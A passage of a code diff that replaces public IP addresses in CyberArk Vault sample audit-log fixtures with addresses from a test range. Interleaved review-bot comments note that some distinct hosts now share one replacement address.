{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:27\n 2021-03-14T12:57:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_SSH\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 34.71.250.247\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:27","IsoTimestamp":"2021-03-14T12:57:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Create File 
Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-14T12:57:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:27\n 2021-03-14T12:57:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_SSH\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 67.43.156.15\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:27","IsoTimestamp":"2021-03-14T12:57:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/7_logon.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/7_logon.log index 82be0d698c1..642ca7704b6 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/7_logon.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/7_logon.log 
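Review bot: The replacement `67.43.156.15` chosen on the last added line for PSMPApp_SSH's station (formerly 34.71.250.247) is the same address this PR assigns to PSMApp_ASR-WIN in 88_set_password.log (formerly 34.66.114.180), so two originally distinct PSM hosts now share one source address across the fixture set. Nothing in this hunk breaks, but any test that counts distinct `Station` values or correlates a PSM component across the sample files will now see fewer hosts than the original data had; if the supported subset has a spare address, giving the ASR-WIN host its own (the PR already uses `67.43.156.14` for it on 2021-03-10 in this file) would keep the original cardinality. The `raw` XML copy and the parsed `Station` field are updated together on each line, which is correct; it would also help to record the old-to-new address mapping once, e.g. in the PR description or a README beside the sample logs, so later fixtures reuse the same subset consistently.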
@@ -5,8 +5,8 @@ <5>1 2021-03-04T19:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 04 11:11:23","IsoTimestamp":"2021-03-04T19:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} <5>1 2021-03-05T10:18:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 05 02:18:50","IsoTimestamp":"2021-03-05T10:18:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PVWAAppUser","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} <5>1 2021-03-08T18:07:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:07:51","IsoTimestamp":"2021-03-08T18:07:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 
00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"37.223.7.45","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} -<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} -<5>1 2021-03-10T09:11:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:49","IsoTimestamp":"2021-03-10T09:11:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 
02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-10T09:11:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:11:49","IsoTimestamp":"2021-03-10T09:11:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/88_set_password.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/88_set_password.log index 308e66ee8c0..0c85cdc8b95 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/88_set_password.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/88_set_password.log 
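Review bot: The Administrator logon at 2021-03-09T10:14:58Z, previously from `37.223.7.45`, now uses `67.43.156.13`, the same replacement given to `81.32.170.205` on the surrounding lines, so the two distinct external administrator sources removed by this hunk collapse into one. If the integration's expected output or a system test asserts on distinct `source.ip`/`related.ip` values per event, that coverage now spans one address instead of two; mapping 37.223.7.45 to another member of the supported subset (`67.43.156.14` is already used by this PR in the other sample logs) would preserve the original cardinality. The `10.0.1.20` `GatewayStation` values are unchanged context, which is appropriate since they are private-range addresses.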
@@ -3,16 +3,16 @@ Mar 08 02:54:46 VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PVWAGWUser","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} <5>1 2021-03-10T08:29:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:29:19","IsoTimestamp":"2021-03-10T08:29:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} <5>1 2021-03-10T08:29:28Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:29:28","IsoTimestamp":"2021-03-10T08:29:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PasswordManager","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Set 
Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:55Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:55","IsoTimestamp":"2021-03-10T09:11:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T16:59:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:54\n 2021-03-11T16:59:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_VAGRANT\n Set Password\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Set Password\n \n 
\n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:54","IsoTimestamp":"2021-03-11T16:59:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T16:59:55Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:55\n 2021-03-11T16:59:55Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_VAGRANT\n Set Password\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:55","IsoTimestamp":"2021-03-11T16:59:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMApp_ASR-WIN\n Set Password\n \n \n \n \n 34.66.114.180\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set 
Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.66.114.180","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_SSH\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_SSH\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n 
PSMP_ADB_asr-cyberark-psm-ssh\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_asr-cyberark-psm-ssh","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:55Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:11:55","IsoTimestamp":"2021-03-10T09:11:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set 
Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T16:59:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:54\n 2021-03-11T16:59:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_VAGRANT\n Set Password\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:54","IsoTimestamp":"2021-03-11T16:59:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T16:59:55Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:55\n 2021-03-11T16:59:55Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_VAGRANT\n Set Password\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
08:59:55","IsoTimestamp":"2021-03-11T16:59:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMApp_ASR-WIN\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 